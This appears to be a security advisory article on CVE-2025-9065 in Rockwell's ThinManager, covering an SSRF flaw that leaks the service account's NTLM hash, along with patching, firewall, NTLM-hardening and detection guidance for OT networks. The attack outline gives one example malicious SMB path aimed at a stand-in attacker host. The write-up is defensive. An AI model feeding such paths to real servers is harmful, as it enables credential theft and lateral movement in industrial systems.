The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reissued a high-severity advisory on September 9, 2025, for a server-side request forgery (SSRF) vulnerability in Rockwell Automation’s ThinManager. Tracked as CVE-2025-9065 and scored 8.6 under CVSS v4, the flaw lets authenticated attackers extract the NTLM hash of the ThinServer service account by feeding it a malicious SMB path. That hash can then be cracked offline or used in pass-the-hash and relay attacks to move laterally across both IT and operational technology (OT) networks. Rockwell fixed the issue in ThinManager 14.1, but for many industrial environments the real challenge lies in balancing urgent patching with the strict change-control processes that govern production floors.
ThinManager’s Critical Role in OT Networks
ThinManager is a widely used thin-client management platform in manufacturing, utilities, and other critical infrastructure sectors. It brokered sessions for operator workstations, managed remote terminals, and often ran with elevated privileges that granted the ThinServer service account broad access to industrial control system (ICS) resources. Any weakness in such software immediately becomes a high-stakes concern because a compromised service account can give attackers a foothold into sensitive control networks.
The service account’s NTLM hash is a particularly valuable target. NTLM, Microsoft’s legacy authentication protocol, remains pervasive in industrial environments where Kerberos may not be fully deployed or where legacy applications and devices require it. Once a hash is captured, adversaries can attempt offline cracking to recover the plaintext password or perform relay attacks to authenticate to other servers without needing the password at all.
How the SSRF Exploit Works
The vulnerability stems from insufficient input sanitization when ThinManager processes SMB paths. An authenticated user—someone who already has valid credentials to access the ThinManager management interface—can craft an SMB path pointing to an attacker-controlled server. When ThinServer attempts to connect to that path, the Windows SMB client automatically attempts NTLM authentication, leaking a challenge/response hash to the attacker’s endpoint.
This is a classic SSRF pattern adapted to the SMB protocol. The high-level attack flow is straightforward:
- An attacker with access to ThinManager’s configuration panel submits a specially crafted SMB path (e.g.,
\\attacker-ip\share). - ThinServer resolves the path and initiates an outbound SMB connection. During the protocol handshake, it sends an NTLM authentication request.
- The attacker’s rogue SMB server captures the NTLM hash and either cracks it offline or relays it to a legitimate target to impersonate the service account.
- With the harvested credentials, the attacker can pivot to file servers, domain controllers, or other ICS components that trust the service account.
CISA’s advisory confirms that the vulnerability requires authenticated access, but in many OT installations the ThinManager interface is accessible to a wide pool of internal users—operators, engineers, and maintenance staff—any of whom could become a threat if their own credentials are stolen or if an insider turns malicious.
Affected Versions and the Patch
Rockwell Automation has acknowledged the issue and released ThinManager version 14.1 to address CVE-2025-9065. All releases in the 13.x and 14.0 branches are vulnerable. The vendor and CISA both strongly recommend upgrading to 14.1 or newer as the primary remediation.
For OT teams, however, the “patch immediately” directive collides with reality. ThinManager often integrates tightly with supervisory control and data acquisition (SCADA) systems, programmable logic controllers (PLCs), and other mission-critical equipment. An untested update could disrupt production, so change management requires weeks of staging, validation, and maintenance-window scheduling. During that gap, compensating controls become essential.
Defensive Layers Beyond the Patch
Organizations that cannot upgrade immediately should implement a series of mitigations to break the attack chain:
Block Outbound SMB
Use firewalls to deny all SMB traffic (TCP 445) and NetBIOS (TCP/UDP 139) from ThinManager servers to anything other than explicitly trusted internal SMB servers. Disallow egress to the internet or to untrusted segments entirely.
Harden NTLM on Clients
On supported Windows systems, enable Group Policy to block NTLM authentication for outbound SMB connections. The policy setting Computer Configuration > Administrative Templates > Network > Lanman Workstation > Block NTLM (LM, NTLM, NTLMv2) can be set to Enabled. For legacy servers that still require NTLM, maintain a carefully audited exception list.
Enforce SMB Signing and Kerberos
SMB signing prevents tampering and some relay attacks, while Kerberos-based authentication is not vulnerable to simple hash replay. Audit your environment for Kerberos capability and enable it wherever possible, using SMB signing as a fallback for endpoints that cannot yet make the switch.
Rotate Service Account Credentials
After patching—or immediately if compromise is suspected—rotate the ThinServer service account password. If NTLM hashes may have been harvested, create an entirely new service account and retire the old one. Managed Service Accounts (MSAs) can further reduce credential exposure.
Limit Network Exposure
Restrict access to ThinManager’s management port (TCP 2031) to only those IP addresses and subnets that require it. Apply industrial firewalls and jump hosts; never expose the management interface directly to the internet.
Least Privilege for the Service Account
Audit the ThinServer account’s rights and strip away any unnecessary permissions. It should never hold domain admin privileges or broad file-share access.
Detection and Incident Response
Even with defenses in place, security teams should hunt for signs of exploitation:
- Outbound SMB connections from ThinManager servers to unexpected IP addresses (especially public IPs or known malicious infrastructure).
- NTLM authentication attempts sourced from the ThinServer host but targeting external or suspicious endpoints.
- Anomalous SMB session establishments to any host not in a predefined allowlist.
If evidence of credential theft surfaces, isolate the affected ThinServer host immediately. Preserve memory dumps, local logs, and network flows. Rotate the service account password—and any other credentials that may have been exposed—and then comb through domain controller and file-server logs for lateral movement attempts. Treat the incident as a potential OT compromise and follow established escalation procedures.
Operational Considerations for the Upgrade
Testing ThinManager 14.1 in a lab that mirrors production is non-negotiable. Validate that thin-client sessions, camera integrations, Remote Desktop Services (RDS) connections, and FactoryTalk integrations work as expected. Check for hard-coded SMB behavior that may rely on older authentication methods; if found, prepare exception lists and document them.
If you enable SMB NTLM blocking, stage the change gradually. Begin with a pilot group of servers, monitor for failures, and expand only after confirming stability. Keep the allowlist for essential legacy systems under strict review.
Long-Term Strategy: Moving Beyond NTLM
CVE-2025-9065 is a symptom of a broader architectural debt in OT networks: reliance on a single, highly privileged service account and a legacy authentication protocol. The fix isn’t just a patch—it’s a shift in identity and access management. Over time, organizations should:
- Migrate service accounts to Group Managed Service Accounts (gMSAs) where possible.
- Decommission NTLM in favor of Kerberos, using SMB signing only where NTLM cannot yet be eliminated.
- Segment OT networks rigorously, using zero-trust principles that assume any internal host can be compromised.
- Adopt regular vulnerability scanning and a predictable patching cadence, even for industrial software.
Bottom Line
CVE-2025-9065 turns a configuration parameter into a credential-exfiltration channel, and in OT environments that can quickly escalate from a single stolen hash to full domain compromise. Rockwell’s release of ThinManager 14.1 closes the door on the vulnerability itself, but during the window when thousands of organizations are still testing the update, the layered defenses outlined here are not optional—they are the only thing standing between a vulnerable server and a determined attacker. Patch aggressively, but lock down your network and monitor relentlessly while you do.